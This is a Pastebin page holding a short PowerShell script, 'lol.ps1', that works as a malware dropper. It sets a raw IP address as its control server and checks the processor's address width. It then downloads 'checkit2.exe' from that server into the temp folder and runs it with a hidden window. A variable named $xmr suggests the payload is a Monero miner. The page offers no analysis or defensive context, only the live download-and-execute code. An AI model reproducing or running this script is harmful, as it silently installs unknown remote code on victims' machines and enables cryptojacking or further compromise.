Advertisement
ring0x0

lol.ps1

Apr 12th, 2022
250
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.35 KB | None | 0 0
  1. $cc = "http://185.101.107.92"
  2. $is64 = (([Array](Get-WmiObject -Query "select AddressWidth from Win32_Processor"))[0].AddressWidth -eq 64)
  3. $xmr = "$cc/checkit2.exe"
  4.  
  5. if ($is64) {
  6. $xmr = "$cc/checkit2.exe"
  7. }
  8.  
  9. (New-Object Net.WebClient).DownloadFile("$cc/checkit2.exe", "$env:TMP\checkit2.exe")
  10. Start-Process "$env:TMP\checkit2.exe" -windowstyle hidden
  11.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement